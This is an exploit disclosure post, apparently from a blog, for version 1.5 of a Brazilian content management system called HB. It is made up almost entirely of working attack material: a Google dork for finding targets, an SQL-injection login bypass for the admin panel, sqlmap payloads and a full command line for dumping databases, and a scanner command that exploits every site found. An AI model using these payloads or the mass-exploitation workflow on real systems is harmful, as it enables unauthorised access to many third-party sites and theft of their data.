Exploit 0day CMS HB 1.5

20 Mayıs 2015 Çarşamba

Exploit 0day CMS HB 1.5

[ + ] FAILURE REPORTED:
15/maio/2015

[ + ] Type:

ADMINISTRATIVE ACCESS PANEL

[ + ] Vendor:
http://www.hbwebecia.com.br/

[ + ] Version:
HB 1.5

[ + ] Google Dork:
inurl:"base.php?pagina"

[ + ] FILE VULN:
/admin/logar.php

[ + ] POC:
(POST) http://{YOU_URL}/admin/logar.php?login='=' 'or'&senha='=' 'or'&Submit3=Entrar

[ + ] FILE VULN:
/base.php

[ + ] POC:
(GET) http://{YOU_URL}/base.php?pagina=noticia&id=1 + (SQLI)

[ + ] Exploração SQLMAP output:
# Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pagina=noticia&id=114' AND 1866=1866 AND 'qvCe'='qvCe

# Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: pagina=noticia&id=114' AND (SELECT * FROM (SELECT(SLEEP(5)))MPQc) AND 'MJVC'='MJVC

# Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: pagina=noticia&id=114' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a786b71,0x664a78565a7276576e76,0x71787a7871),NULL,NULL--

[ + ] USE SQLMAP:
./sqlmap.py -u 'http://{YOU_URL}/base.php?pagina=noticia&id=1'
--dbs --random-agent --level 3 --risk 2--proxy 'http://localhost:8118'
--dbms='MySQL' --threads 3 --time-sec 10 --identify-waf --text-only
--flush-session --batch

[ + ] EXECUTE:
php xpl.php -t http://target.us

[ + ] FILE_OUTPUT :
HB.txt

PRINT OUTPUT:

[ + ] EXECUTE: php xpl.php -t http://target.us

[ + ] Exploit:
http://www.exploit4arab.net/exploits/1505

[ + ] EXPLOIT MASS USE SCANNER INURLBR:
php inurlbr.php --dork 'inurl:base.php?pagina" ext:php' -s output.txt --command-all 'php xpl.php -t _TARGET_'

PRINT OUTPUT:

[ + ] EXPLOIT MASS USE SCANNER INURLBR: php inurlbr.php --dork 'inurl:base.php?pagina" ext:php' -s output.txt--command-all 'php xpl.php -t _TARGET_' PRINT OUTPUT:

More details about inurlbr scanner: https://github.com/googleinurl/SCANNER-INURLBR

20 Mayıs 2015 Çarşamba